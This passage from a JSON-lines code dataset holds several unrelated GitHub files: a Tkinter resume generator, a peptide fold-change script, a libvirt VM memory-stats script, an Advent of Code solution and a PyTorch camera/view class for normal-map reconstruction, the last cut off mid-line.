grey\")\r\n\r\nname=StringVar()\r\nemail=StringVar()\r\nmobile=StringVar()\r\naddress=StringVar()\r\ndob=StringVar()\r\ngender=StringVar()\r\nchoice=IntVar()\r\n\r\nroothead=LabelFrame(root,width=350,height=400,font=('arial',20,'bold'),text=\"Personal Details\",bg=\"light grey\")\r\nroothead.grid(row=0,column=0)\r\n\r\ndef expexit():\r\n exp.destroy()\r\n return\r\ndef expnext():\r\n global others\r\n others=Tk()\r\n others.title(\"Others\")\r\n others.geometry(\"770x675+0+0\")\r\n others.config(bg=\"light grey\")\r\n def otherprev():\r\n others.destroy()\r\n return\r\n def othernext():\r\n global final\r\n final=Tk()\r\n final.title(\"Resume\")\r\n final.geometry(\"850x850+0+0\")\r\n final.config(bg=\"light grey\")\r\n def fprint():\r\n q=res.get(\"1.0\",\"end-1c\")\r\n filename=tempfile.mktemp(\".txt\")\r\n open(filename,\"w\").write(q)\r\n os.startfile(filename,\"print\")\r\n def fexit():\r\n final.destroy()\r\n def fclear():\r\n res.delete(1.0,END)\r\n lbltit=Label(final,font=('arial',30,'bold'),text=\"Resume\",bg=\"light grey\")\r\n lbltit.pack()\r\n res=Text(final,bd=1,width=70,height=30,padx=10,pady=10,wrap=WORD,bg=\"white\",font=('arial',12,'italic'))\r\n res.pack()\r\n\r\n 
buttonframe=Frame(final,bd=2,width=790,height=10,padx=8,pady=10,bg=\"light grey\",relief=RIDGE)\r\n buttonframe.pack()\r\n Button(buttonframe,text=\"Exit\",font=('arial',13),pady=5,height=1,width=28,bd=2,command=fexit).grid(row=0,column=0,sticky=W)\r\n Button(buttonframe,text=\"Print\",font=('arial',13),pady=5,height=1,width=28,bd=2,command=fprint).grid(row=0,column=1,sticky=W)\r\n Button(buttonframe,text=\"Clear\",font=('arial',13),pady=5,height=1,width=28,bd=2,command=fclear).grid(row=0,column=2,sticky=W)\r\n \r\n \r\n res.insert(1.0,nametxt.get().upper()+\"\\n\")\r\n res.insert(50.0,emailtxt.get()+\"\\n\")\r\n res.insert(4.0,phone_numtxt.get()+\"\\n\")\r\n \r\n \r\n res.insert(5.0,'-----------------------------------------Career Objective------------------------------------------------------\\n')\r\n res.insert(6.0,\"\\t\"+cotext.get(1.0,END))\r\n res.insert(7.0,'---------------------------------------------------Education-------------------------------------------------------\\n')\r\n for i in range(len(lst)):\r\n for j in range(1):\r\n res.insert(8.0,\"\\t\"+lst[i][0].upper()+\"\\t|\")\r\n res.insert(8.0,\"\\n\")\r\n\r\n for i in range(len(lst)):\r\n for j in range(1):\r\n res.insert(9.0,\"\\t\"+lst[i][1].upper()+\"\\t|\")\r\n res.insert(9.0,\"\\n\")\r\n for i in range(len(lst)):\r\n for j in range(1):\r\n res.insert(10.0,\"\\t\"+lst[i][2].upper()+\"\\t|\")\r\n res.insert(10.0,\"\\n\")\r\n for i in range(len(lst)):\r\n for j in range(1):\r\n res.insert(11.0,\"\\t\"+lst[i][3].upper()+\"\\t|\")\r\n res.insert(11.0,\"\\n\")\r\n if (len(skilltext.get(1.0,END))-1)>0:\r\n res.insert(12.0,'---------------------------------------------------Skills---------------------------------------------------------------\\n')\r\n res.insert(13.0,\"\\t\"+skilltext.get(1.0,END))\r\n if (len(projecttext.get(1.0,END))-1)!=0:\r\n res.insert(30.0,'-----------------------------------------------Projects--------------------------------------------------------------\\n')\r\n res.insert(31.0,projecttext.get(1.0,END))\r\n if (len(wetext.get(1.0,END))-1)!=0:\r\n res.insert(45.0,'-----------------------------------------Work Experience------------------------------------------------------\\n')\r\n res.insert(55.0,wetext.get(1.0,END))\r\n res.insert(56.0,'---------------------------------------------------------Personal Details---------------------------------------\\n')\r\n res.insert(57.0,\"Address \\t:\\t\"+addresstxt.get()+\"\\n\")\r\n res.insert(61.0,\"Date of Birth \\t:\\t\"+dobtext.get()+\"\\n\")\r\n if (len(hobbytext.get(1.0,END))-1)!=0:\r\n res.insert(63.0,\"Hobbies \\t:\\t\"+hobbytext.get(1.0,END))\r\n if (len(achievementstext.get(1.0,END))-1)!=0:\r\n res.insert(70.0,\"Achievements\\t:\\t\"+achievementstext.get(1.0,END))\r\n if choice.get()==1:\r\n res.insert(71.0,\"Gender \\t:\\tMale\\n\")\r\n elif choice.get()==2:\r\n res.insert(71.0,\"Gender \\t:\\tFemale\\n\")\r\n if (len(languagetext.get(1.0,END))-1)!=0:\r\n res.insert(72.0,\"Languages\\t:\\t\"+languagetext.get(1.0,END))\r\n res.insert(77.0,'-----------------------------------------Declaration---------------------------------------------------------------\\n')\r\n res.insert(78.0,declarationtext.get(1.0,END))\r\n Label(others,font=('arial',18,'bold'),text=\"Others\",padx=3,pady=4,bg='light grey').grid(row=0,column=0,columnspan=2,sticky=W)\r\n Label(others,font=('arial',15,'italic'),text=\"Skills:\",padx=3,pady=4,bg='light grey').grid(row=1,column=0,sticky=W)\r\n 
skilltext=Text(others,width=50,height=4,bd=2,bg=\"white\",padx=3,pady=5,wrap=WORD,font=('arial',13,'italic'))\r\n skilltext.grid(row=1,column=1,columnspan=2,sticky=W)\r\n Label(others,font=('arial',15,'italic'),text=\"Achievements:\",padx=3,pady=4,bg='light grey').grid(row=2,column=0,sticky=W)\r\n achievementstext=Text(others,width=50,height=4,bd=2,bg=\"white\",padx=3,pady=5,wrap=WORD,font=('arial',13,'italic'))\r\n achievementstext.grid(row=2,column=1,columnspan=2,sticky=W)\r\n Label(others,font=('arial',15,'italic'),text=\"Hobby:\",padx=3,pady=4,bg='light grey').grid(row=3,column=0,sticky=W)\r\n hobbytext=Text(others,width=50,height=4,bd=2,bg=\"white\",padx=3,pady=5,wrap=WORD,font=('arial',13,'italic'))\r\n hobbytext.grid(row=3,column=1,columnspan=2,sticky=W)\r\n Label(others,font=('arial',15,'italic'),text=\"Languages:\",padx=3,pady=4,bg='light grey').grid(row=4,column=0,sticky=W)\r\n languagetext=Text(others,width=50,height=4,bd=2,bg=\"white\",wrap=WORD,padx=3,pady=5,font=('arial',13,'italic'))\r\n languagetext.grid(row=4,column=1,columnspan=2,sticky=W)\r\n Label(others,font=('arial',15,'italic'),text=\"Declaration:\",padx=3,pady=4,bg='light grey').grid(row=9,column=0,sticky=W)\r\n declarationtext=Text(others,width=106,height=5,bd=2,bg=\"white\",padx=3,wrap=WORD,pady=5,font=('arial',10,'italic'))\r\n declarationtext.grid(row=10,column=0,columnspan=2,sticky=W,pady=2)\r\n declarationtext.insert(1.0,\"I solemnly declare that all the information furnished in this document is free of errors to the best of my knowledge\\n\")\r\n \r\n Button(others,font=('arial',13,'italic'),text=\"Previous\",padx=3,pady=5,height=1,width=73,bd=3,command=otherprev).grid(row=11,column=0,columnspan=2,pady=2)\r\n Button(others,font=('arial',13,'italic'),text=\"Continue\",padx=3,pady=5,height=1,width=73,bd=3,command=othernext).grid(row=12,column=0,columnspan=2,pady=2)\r\n\r\n#root functions\r\ndef rootnext():\r\n if len(nametxt.get())>0 and len(emailtxt.get())>0 and len(phone_numtxt.get())>0 and len(addresstxt.get())>0 and len(dobtext.get())>0 and choice.get()>0 and (len(cotext.get(1.0,END))-1)>0:\r\n global edu\r\n global coursetxt\r\n global institutetxt\r\n global boardtxt\r\n global yoptxt\r\n global markstxt\r\n global lst\r\n\r\n\r\n edu=Tk()\r\n edu.title(\"Educational Details\")\r\n edu.geometry(\"450x350+0+0\")\r\n edu.config(bg=\"light grey\")\r\n \r\n \r\n def prev():\r\n edu.destroy()\r\n \r\n return\r\n \r\n lst=[]\r\n #edu functions\r\n def eduadd():\r\n if len(institutetxt.get())>0 and len(coursetxt.get())>0 and len(markstxt.get())>0 and len(yoptxt.get())>0:\r\n lst.append((institutetxt.get(),coursetxt.get(),markstxt.get(),yoptxt.get()))\r\n institutetxt.delete(0,END)\r\n coursetxt.delete(0,END)\r\n markstxt.delete(0,END)\r\n yoptxt.delete(0,END)\r\n \r\n else:\r\n tkinter.messagebox.showinfo(\"Warning!!!\",\"All fields are mandatory\")\r\n \r\n\r\n def edunext():\r\n if len(lst)>0:\r\n global exp\r\n global projecttext\r\n global wetext\r\n exp=Tk()\r\n exp.title(\"Project and Work Experience\")\r\n exp.geometry(\"575x415+0+0\")\r\n exp.config(bg=\"light grey\")\r\n #exphead=LabelFrame(exp,width=440,height=400,font=('arial',20,'bold'),text=\"Personal Details\",bg=\"light grey\").grid(row=0,column=0)\r\n explabel=Label(exp,font=('arial',18,'bold'),text=\"Projects and Work Experience\",padx=3,pady=4,bg='light grey').grid(row=0,column=0,sticky=E)\r\n projectlabel=Label(exp,font=('arial',15,'italic'),text=\"Projects:\",padx=3,pady=4,bg='light grey').grid(row=1,column=0,sticky=W)\r\n 
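# free-form Text areas capture the optional Projects and Work Experience sections\r\n 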
projecttext=Text(exp,width=77,height=5,bd=3,bg=\"white\",padx=3,pady=5,font=('arial',10,'italic'))\r\n projecttext.grid(row=2,column=0,columnspan=2,sticky=W)\r\n welabel=Label(exp,font=('arial',15,'italic'),text=\"Work Experience:\",padx=3,pady=4,bg='light grey').grid(row=3,column=0)\r\n wetext=Text(exp,width=77,height=5,bd=3,bg=\"white\",padx=3,pady=5,font=('arial',10,'italic'))\r\n wetext.grid(row=4,column=0,columnspan=2,sticky=W)\r\n Button(exp,font=('arial',13,'italic'),text=\"Previous\",padx=3,pady=5,height=1,width=53,bd=3,command=expexit).grid(row=5,column=0,columnspan=2,pady=2)\r\n Button(exp,font=('arial',13,'italic'),text=\"Save & Continue\",padx=3,pady=5,height=1,width=53,bd=3,command=expnext).grid(row=6,column=0,columnspan=2,pady=2)\r\n else:\r\n tkinter.messagebox.showinfo(\"Warning!!!\",\"All fields are mandatory\") \r\n\r\n \r\n eduhead=LabelFrame(edu,width=500,height=350,font=('arial',20,'bold'),text=\"Educational Qualification\",bg=\"light grey\")\r\n eduhead.grid(row=0,column=0)\r\n institutelabel=Label(eduhead,font=('arial',15,'italic'),text=\"Institute:\",padx=3,pady=4,bg='light grey').grid(row=0,column=0,sticky=W)\r\n institutetxt=Entry(eduhead,font=('arial',15,'italic'),width=25,bg='ghost white')\r\n institutetxt.grid(row=0,column=1,sticky=W)\r\n courselabel=Label(eduhead,font=('arial',15,'italic'),text=\"Course:\",padx=3,pady=4,bg='light grey').grid(row=1,column=0,sticky=W)\r\n coursetxt=Entry(eduhead,font=('arial',15,'italic'),width=25,bg='ghost white')\r\n coursetxt.grid(row=1,column=1,sticky=W)\r\n #boardlabel=Label(eduhead,font=('arial',15,'italic'),text=\"Board:\",padx=3,pady=4,bg='light grey').grid(row=2,column=0,sticky=W)\r\n #boardtxt=Entry(eduhead,font=('arial',15,'italic'),width=25,bg='ghost white')\r\n #boardtxt.grid(row=2,column=1,sticky=W)\r\n markslabel=Label(eduhead,font=('arial',15,'italic'),text=\"Marks Obtained:\",padx=3,pady=4,bg='light grey').grid(row=3,column=0,sticky=W)\r\n markstxt=Entry(eduhead,font=('arial',15,'italic'),width=25,bg='ghost white')\r\n markstxt.grid(row=3,column=1,sticky=W)\r\n yoplabel=Label(eduhead,font=('arial',15,'italic'),text=\"Year of Passing:\",padx=3,pady=4,bg='light grey').grid(row=4,column=0,sticky=W)\r\n yoptxt=Entry(eduhead,font=('arial',15,'italic'),width=25,bg='ghost white')\r\n yoptxt.grid(row=4,column=1,sticky=W)\r\n Button(eduhead,font=('arial',13,'italic'),text=\"Previous\",padx=3,pady=5,height=1,width=43,bd=1,command=prev).grid(row=5,column=0,columnspan=2)\r\n edunextbtn=Button(eduhead,text=\"Save&Continue\",font=('arial',13,\"italic\"),padx=3,pady=5,height=1,width=43,bd=1,command=edunext).grid(row=6,column=0,columnspan=2,pady=3)\r\n eduaddtbtn=Button(eduhead,text=\"add\",font=('arial',13,\"italic\"),padx=3,pady=5,height=1,width=43,bd=1,command=eduadd).grid(row=7,column=0,columnspan=2,pady=3)\r\n #Button(eduhead,text=\"sample\",command=display).grid(row=8,column=0)\r\n else:\r\n tkinter.messagebox.showinfo(\"Warning!!!\",\"All fields are mandatory\")\r\n \r\ndef iexit():\r\n root.destroy()\r\n return\r\n\r\n#label and entry root\r\nnamelabel=Label(roothead,font=('arial',15,'italic'),text=\"Name:\",padx=3,pady=4,bg='light grey').grid(row=0,column=0,sticky=W)\r\nnametxt=Entry(roothead,font=('arial',15,'italic'),textvariable=name,width=25,bg='ghost white')\r\nnametxt.grid(row=0,column=1,sticky=W)\r\n\r\nemaillabel=Label(roothead,font=('arial',15,'italic'),text=\"Email:\",padx=3,pady=4,bg='light 
grey').grid(row=1,column=0,sticky=W)\r\nemailtxt=Entry(roothead,font=('arial',15,'italic'),textvariable=email,width=25,bg='ghost white')\r\nemailtxt.grid(row=1,column=1,sticky=W)\r\n\r\nphone_numlabel=Label(roothead,font=('arial',15,'italic'),text=\"Mobile:\",padx=3,pady=4,bg='light grey').grid(row=2,column=0,sticky=W)\r\nphone_numtxt=Entry(roothead,font=('arial',15,'italic'),textvariable=mobile,width=25,bg='ghost white')\r\nphone_numtxt.grid(row=2,column=1,sticky=W)\r\n\r\naddresslabel=Label(roothead,font=('arial',15,'italic'),text=\"Address:\",padx=3,pady=4,bg='light grey').grid(row=3,column=0,sticky=W)\r\naddresstxt=Entry(roothead,font=('arial',15,'italic'),textvariable=address,width=25,bg='ghost white')\r\naddresstxt.grid(row=3,column=1,sticky=W)\r\n\r\ndoblabel=Label(roothead,font=('arial',15,'italic'),text=\"DoB:\",padx=3,pady=4,bg='light grey').grid(row=4,column=0,sticky=W)\r\ndobtext=Entry(roothead,font=('arial',15,'italic'),textvariable=dob,width=25,bg='ghost white')\r\ndobtext.grid(row=4,column=1,sticky=W)\r\n\r\ngenderlabel=Label(roothead,font=('arial',15,'italic'),text=\"Gender:\",padx=3,pady=4,bg='light grey').grid(row=5,column=0,sticky=W)\r\ncolabel=Label(roothead,font=('arial',15,'italic'),text=\"Career Objective:\",padx=3,pady=4,bg='light grey').grid(row=6,column=0,sticky=W)\r\ncotext=Text(roothead,width=48,height=5,bd=3,bg=\"white\",wrap=WORD,padx=3,pady=5,font=('arial',13,'italic'))\r\ncotext.grid(row=7,column=0,columnspan=2,sticky=W)\r\n#radiobutton\r\ndef select():\r\n select=choice.get()\r\nmale=Radiobutton(roothead,text=\"Male\",font=('arial',10,'italic'),bg=\"light grey\",fg=\"grey\",variable=choice,value=1,command=select).grid(row=5,column=1,sticky=W)\r\nfemale=Radiobutton(roothead,text=\"Female\",font=('arial',10,'italic'),bg=\"light grey\",fg=\"grey\",variable=choice,value=2,command=select).grid(row=5,column=1,sticky=E)\r\n#button\r\nrootnextbtn=Button(roothead,text=\"Save&Continue\",font=('arial',13),pady=5,height=1,width=49,bd=2,command=rootnext).grid(row=8,column=0,sticky=W,columnspan=2,pady=2)\r\nrootexitbtn=Button(roothead,text=\"Exit\",font=('arial',13),pady=5,height=1,width=49,bd=2,command=iexit).grid(row=9,column=0,sticky=W,columnspan=2,pady=2)\r\n#rootaddtbtn=Button(roothead,text=\"add\",font=('arial',13),padx=3,pady=5,height=1,width=40,bd=1,command=add).grid(row=9,column=0,columnspan=2)\r\n","repo_name":"manjumtr/Resume-Generator","sub_path":"resume_generator.py","file_name":"resume_generator.py","file_ext":"py","file_size_in_byte":15004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8120644936","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 5 10:33:26 2023\n\n@author: liuyi\n\"\"\"\nimport pandas as pd\nimport 
math\n\npeptide_file_1='openms_result_ecoli_bg_ed/E4801_230403_200ng_293T_15ng_Ecoli_05xiRT_60min_DDA_R1_ecoli.csv'\npeptide_file_2='openms_result_ecoli_bg_ed/E4801_230402_200ng_293T_10ng_Ecoli_05xiRT_60min_DDA_R1_ecoli.csv'\n\n\nfile='mass_align_all_information/information_target.csv'\n\nresult_name='15_10_R1_Ecoli_deeprtalign_FC_openms_information_target_0.01_20230712.csv'\n\nsample_1='480_1_15_R1'\nsample_2='480_1_10_R1'\n\npeptide_df_1=pd.read_csv(peptide_file_1)\npeptide_df_2=pd.read_csv(peptide_file_2)\npeptide_df=pd.concat([peptide_df_1,peptide_df_2],ignore_index=True)\n\nresult={'sample_1':[],'sample_2':[],'FC':[],'peptide':[],'peptide_modi':[],'charge':[],'sample_1_mz':[],'sample_1_rt':[],'sample_1_intensity':[],'sample_2_mz':[],'sample_2_rt':[],'sample_2_intensity':[],'adj_score':[]}\n\ngroups=[]\n\ndf=pd.read_csv(file)\n\ntotal_num=len(peptide_df)\nn=0\nfor index in peptide_df.index:\n\tn=n+1\n\tprint(n,'/',total_num)\n\tsample_mz=peptide_df.loc[index]['mz']\n\tsample_rt=peptide_df.loc[index]['rt']/60\n\tsample_intensity=peptide_df.loc[index]['intensity']\n\tpeptide=peptide_df.loc[index]['peptide']\n\tpeptide_modi=peptide_df.loc[index]['peptide_modi']\n\tcharge=peptide_df.loc[index]['charge']\n\t\n\t#use 0.01 window (mz,rt,intensity) to find the same feature\n\tdf_sample=df[(df['mz']>sample_mz-0.01)&(df['mz']<sample_mz+0.01)]\n\tdf_sample=df_sample[(df_sample['time']>sample_rt-0.01)&(df_sample['time']<sample_rt+0.01)]\n\tdf_sample=df_sample[(df_sample['intensity']>sample_intensity-0.01)&(df_sample['intensity']<sample_intensity+0.01)]\n\tif len(df_sample)>0:\n\t\tfor df_sample_index in df_sample.index:\n\t\t\tgroup=df_sample.loc[df_sample_index]['group']\n\t\t\tif group in groups:\n\t\t\t\tcontinue\n\t\t\tgroups.append(group)\n\t\t\tdf_group=df[df['group']==group]\n\t\t\tif len(df_group)<2:\n\t\t\t\tcontinue\n\t\t\tif not (sample_1 in list(df_group['sample']) and sample_2 in list(df_group['sample'])):\n\t\t\t\tcontinue\n\t\t\tfor group_index in df_group.index:\n\t\t\t\tsample=df_group.loc[group_index]['sample']\n\t\t\t\tif sample==sample_1:\n\t\t\t\t\tsample_1_mz=df_group.loc[group_index]['mz']\n\t\t\t\t\tsample_1_rt=df_group.loc[group_index]['time']\n\t\t\t\t\tsample_1_intensity=df_group.loc[group_index]['intensity']\n\t\t\t\t\tsample_1_score=df_group.loc[group_index]['intensity']\n\t\t\t\t\tadj_score=df_group.loc[group_index]['adj_score']\n\t\t\t\tif sample==sample_2:\n\t\t\t\t\tsample_2_mz=df_group.loc[group_index]['mz']\n\t\t\t\t\tsample_2_rt=df_group.loc[group_index]['time']\n\t\t\t\t\tsample_2_intensity=df_group.loc[group_index]['intensity']\n\t\t\tFC=math.log2(sample_1_intensity)-math.log2(sample_2_intensity)\n\t\t\tresult['sample_1'].append(sample_1)\n\t\t\tresult['sample_2'].append(sample_2)\n\t\t\tresult['FC'].append(FC)\n\t\t\tresult['peptide'].append(peptide)\n\t\t\tresult['peptide_modi'].append(peptide_modi)\n\t\t\tresult['charge'].append(charge)\n\t\t\tresult['sample_1_mz'].append(sample_1_mz)\n\t\t\tresult['sample_1_rt'].append(sample_1_rt)\n\t\t\tresult['sample_1_intensity'].append(sample_1_intensity)\n\t\t\tresult['sample_2_mz'].append(sample_2_mz)\n\t\t\tresult['sample_2_rt'].append(sample_2_rt)\n\t\t\tresult['sample_2_intensity'].append(sample_2_intensity)\n\t\t\tresult['adj_score'].append(adj_score)\nresult_df=pd.DataFrame(result)\nresult_df.drop_duplicates(['sample_1_mz','sample_1_rt','sample_2_mz','sample_2_rt'],inplace=True)\nresult_df.to_csv(result_name,index=False)","repo_name":"PHOENIXcenter/deeprtalign","sub_path":"code for the 
experiments/02_collect_deeprtalign_FC.py","file_name":"02_collect_deeprtalign_FC.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"32754545985","text":"from server import get_arg, get_server, response\n\nserve = get_server()\n\nname = get_arg('ip[ip]')\n\ntry:\n machine = serve.lookupByName(name)\nexcept:\n response(False)\n \ntry:\n stats = machine.memoryStats()\nexcept:\n response(False)\n\n# RAM stats\nram = stats['actual']\nused_ram = ram - stats['available']\n \ndata = {'ram': ram, 'usedRam': used_ram}\n\nresponse(True, data)","repo_name":"autovmnet/kvm","sub_path":"modules/kvm/python/usage.py","file_name":"usage.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38356293356","text":"import sys\nfrom itertools import product, chain, filterfalse, count\nfrom functools import reduce\n\nlines = []\nfor line in sys.stdin:\n line = line.strip()\n coords = map(lambda x: (int(x[0]), int(x[1])), map(lambda x: x.split(\",\"), line.split(\" -> \")))\n lines.append(list(coords))\n\nmx, my = reduce(lambda m, l: (max(l[0][0], l[1][0], m[0]), max(l[0][1], l[1][1] ,m[1])), lines, (0,0))\nmap = [[0]*(my+1) for i in range(mx+1)]\n\nsign = lambda x: -1 if x < 0 else (1 if x > 0 else 0)\n\ndef find_overlap_count(part):\n for [(x1,y1), (x2,y2)] in lines:\n dir = (sign(x2-x1), sign(y2-y1))\n if part == 1 and (dir[0] !=0 and dir[1] !=0):\n continue\n x, y = x1, y1\n while True:\n map[x][y] = map[x][y] + 1\n if (x,y) == (x2,y2):\n break\n x, y = x + dir[0], y + dir[1]\n\n count = len(list(filterfalse(lambda x: x <= 1, chain.from_iterable(map))))\n print(count)\n\nfind_overlap_count(1)\nmap = [[0]*(my+1) for i in range(mx+1)]\nfind_overlap_count(2)","repo_name":"deepakjois/advent-of-code-2021","sub_path":"day5/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1791209610","text":"import cv2\nimport numpy as np\nfrom pathlib import Path\nfrom PIL import Image\nif not hasattr(Image, 'Resampling'): # Pillow<9.0\n Image.Resampling = Image\nfrom rembg.bg import remove\nimport io\nimport torch\nfrom torchvision import transforms\n\nfrom normal_nds.nds.core import Camera\n\nclass View:\n \"\"\" A View is a combination of camera and image(s).\n\n Args:\n color (tensor): RGB color image (WxHx3)\n mask (tensor): Object mask (WxHx1)\n camera (Camera): Camera associated with this view\n device (torch.device): Device where the images and camera are stored\n \"\"\"\n\n def __init__(self, color, mask, camera, view_angle=0, orthographic=True, device='cpu'):\n self.color = color.to(device)\n self.mask = mask.to(device)\n self.camera = camera.to(device)\n self.view_angle = view_angle\n self.orthographic = orthographic\n self.device = device\n\n def to_world(normal_cam, view_angle,):\n '''\n normal_cam : [4, h, w] tensor. 
normal map in camera view \n view_angle: yaw angle of camera view in degree\n '''\n view_angle = torch.deg2rad(torch.tensor(view_angle))\n rot = torch.tensor([[torch.cos(view_angle), 0, torch.sin(view_angle)],\n [0, 1, 0],\n [-torch.sin(view_angle), 0, torch.cos(view_angle)]], dtype=normal_cam.dtype, device=normal_cam.device)\n mask = normal_cam[3, :, :] >= 0\n normal_world = normal_cam.clone()\n normal_world[:3, mask] = torch.einsum('ij, jk->ik', rot.T, normal_cam[:3, mask])\n\n return normal_world\n\n @classmethod\n def load_icon(cls, image_path, scale, center, ortho_ratio=0.4, res=512, view_angle=0, camera_depth=1.6, device='cpu'):\n \"\"\"\n Set approximated orthographic cameras.\n We assume the mesh is\n (1) centered to the pelvis(0th joint), which means the camera axis goes through the pelvis,\n (2) scaled to the height of 180, which means the mesh occupies 450 out of 512 images with ortho_ratio=0.4\n reference: https://github.com/YuliangXiu/ICON/\n \"\"\"\n\n camera = Camera.camera_with_angle(scale=scale, center=center,\n view_angle=view_angle, \n device=device)\n\n # Load the color\n color = (Image.open(image_path))\n num_ch = len(color.split())\n if num_ch == 3: # without alpha channel\n # clear background\n buf_front = io.BytesIO()\n color.save(buf_front, format='png')\n color = Image.open(io.BytesIO(remove(buf_front.getvalue()))).convert(\"RGBA\")\n color_t = transforms.ToTensor()(color)\n color_world = (0.5 * (cls.to_world(2 * color_t - 1, int(view_angle)) + 1)).permute(1, 2, 0)\n \n # Extract the mask\n if color_world.shape[2] == 4:\n mask = color_world[:, :, 3:]\n else:\n mask = torch.ones_like(color_world[:, :, 0:1])\n\n color_world = color_world[:, :, :3]\n\n return cls(color_world, mask, camera, view_angle=view_angle, orthographic=True, device=device) \n\n @classmethod\n def load_smpl_mask(cls, smpl_image, scale, center, ortho_ratio=0.4, res=512, view_angle=0, camera_depth=1.6, device='cpu'):\n ortho_ratio = ortho_ratio * (512 / res)\n y = np.deg2rad(int(view_angle))\n R = np.array([[np.cos(y), 0, np.sin(y)],\n [0, 1, 0],\n [-np.sin(y), 0, np.cos(y)]])\n\n t = -np.dot(R, center + np.array([0, 0, camera_depth]))\n\n K = np.identity(3)\n K[0, 0] = 2.0 * scale / (res * ortho_ratio)\n K[1, 1] = 2.0 * scale / (res * ortho_ratio)\n K[2, 2] = 0.001 # 2 / (zFar - zNear), following ICON rendering code : zFar=100, zNear=-100\n camera = Camera(K, R, t, orthographic=True, device=device)\n \n # Extract the mask\n mask = smpl_image[:, :, 3:]\n\n return cls(smpl_image, mask, camera, view_angle=view_angle, orthographic=True, device=device) \n\n @classmethod\n def load_dvr(cls, image_path, cameras_path=None, view_angle=0, device='cpu'):\n \"\"\" Load a view from a given image path.\n\n The paths of the camera matrices are deduced from the image path. 
\n Given an image path `path/to/directory/foo.png`, the paths to the camera matrices\n in numpy readable text format are assumed to be `path/to/directory/foo_k.txt`, \n `path/to/directory/foo_r.txt`, and `path/to/directory/foo_t.txt`.\n\n Args:\n image_path (Union[Path, str]): Path to the image file that contains the color and optionally the mask\n device (torch.device): Device where the images and camera are stored\n \"\"\"\n\n image_path = Path(image_path)\n\n # Load the camera\n if cameras_path is None:\n cameras_path = image_path.parent.parent / \"cameras.npz\"\n if cameras_path.is_file():\n cam = np.load(cameras_path)\n frame_num = cam[image_path.name]\n pose = cam[\"pose_\"+str(frame_num)]\n R = pose[:3, :3]\n t = pose[:3, 3]\n K = cam[\"intrinsic_\"+str(frame_num)]\n else:\n K = np.loadtxt(image_path.parent / (image_path.stem + \"_k.txt\"))\n R = np.loadtxt(image_path.parent / (image_path.stem + \"_r.txt\"))\n t = np.loadtxt(image_path.parent / (image_path.stem + \"_t.txt\"))\n camera = Camera(K, R, t)\n \n # Load the color\n color = torch.FloatTensor(np.array(Image.open(image_path)))\n color /= 255.0\n \n # Extract the mask\n if color.shape[2] == 4:\n mask = color[:, :, 3:]\n else:\n mask = torch.ones_like(color[:, :, 0:1])\n\n color = color[:, :, :3]\n\n return cls(color, mask, camera, view_angle=view_angle, device=device)\n \n @classmethod\n def load_co3d(cls, image_path, mask_path, pose, intrinsic, mask_threshold, device='cpu'):\n \"\"\" Load co3d images.\n \"\"\"\n\n image_path = Path(image_path)\n mask_path = Path(mask_path)\n\n # Load the camera\n K = intrinsic\n R = pose[:3, :3]\n t = pose[:3, 3]\n camera = Camera(K, R, t)\n \n # Load the color\n color = torch.FloatTensor(np.array(Image.open(image_path)))\n color /= 255.0\n \n # Extract the mask\n if color.shape[2] == 4:\n mask = color[:, :, 3:]\n else:\n mask = torch.ones_like(color[:, :, 0:1])\n\n color = color[:, :, :3]\n \n # Extract the mask\n mask = torch.FloatTensor(np.array(Image.open(mask_path)))\n mask /= 255.0\n if len(mask.shape) < 3:\n mask = mask.unsqueeze(-1)\n else:\n mask = mask[:, :, 0].unsqueeze(-1)\n mask_type = mask.dtype\n mask = (mask > mask_threshold).type(mask_type)\n\n # Exclude black image\n y, x = np.where(mask[:, :, 0])\n if len(x) != 0 and len(y) != 0:\n return cls(color, mask, camera, device=device)\n else:\n None\n\n def to(self, device: str = \"cpu\"):\n self.color = self.color.to(device)\n self.mask = self.mask.to(device)\n self.camera = self.camera.to(device)\n self.device = device\n return self\n\n @property\n def resolution(self):\n return (self.color.shape[0], self.color.shape[1])\n \n def scale(self, inverse_factor):\n \"\"\" Scale the view by a factor.\n \n This operation is NOT differentiable in the current state as \n we are using opencv.\n\n Args:\n inverse_factor (float): Inverse of the scale factor (e.g. 
to halve the image size, pass `2`)\n \"\"\"\n \n scaled_height = self.color.shape[0] // inverse_factor\n scaled_width = self.color.shape[1] // inverse_factor\n\n scale_x = scaled_width / self.color.shape[1]\n scale_y = scaled_height / self.color.shape[0]\n \n self.color = torch.FloatTensor(cv2.resize(self.color.cpu().numpy(), dsize=(scaled_width, scaled_height), interpolation=cv2.INTER_LINEAR)).to(self.device)\n self.mask = torch.FloatTensor(cv2.resize(self.mask.cpu().numpy(), dsize=(scaled_width, scaled_height), interpolation=cv2.INTER_NEAREST)).to(self.device)\n self.mask = self.mask.unsqueeze(-1) # Make sure the mask is HxWx1\n\n self.camera.K = torch.FloatTensor(np.diag([scale_x, scale_y, 1])).to(self.device) @ self.camera.K \n \n def transform(self, A, A_inv=None):\n \"\"\" Transform the view pose with an affine mapping.\n\n Args:\n A (tensor): Affine matrix (4x4)\n A_inv (tensor, optional): Inverse of the affine matrix A (4x4)\n \"\"\"\n\n if not torch.is_tensor(A):\n A = torch.from_numpy(A)\n \n if A_inv is not None and not torch.is_tensor(A_inv):\n A_inv = torch.from_numpy(A_inv)\n\n A = A.to(self.device, dtype=torch.float32)\n if A_inv is not None:\n A_inv = A_inv.to(self.device, dtype=torch.float32)\n\n if A_inv is None:\n A_inv = torch.inverse(A)\n\n # Transform camera extrinsics according to [R'|t'] = [R|t] * A_inv.\n # We compose the projection matrix and decompose it again, to correctly\n # propagate scale and shear related factors to the K matrix, \n # and thus make sure that R is a rotation matrix.\n R = self.camera.R @ A_inv[:3, :3]\n t = self.camera.R @ A_inv[:3, 3] + self.camera.t\n\n if self.orthographic:\n self.camera.R = R\n self.camera.t = t\n else:\n P = torch.zeros((3, 4), device=self.device)\n P[:3, :3] = self.camera.K @ R\n P[:3, 3] = self.camera.K @ t\n K, R, c, _, _, _, _ = 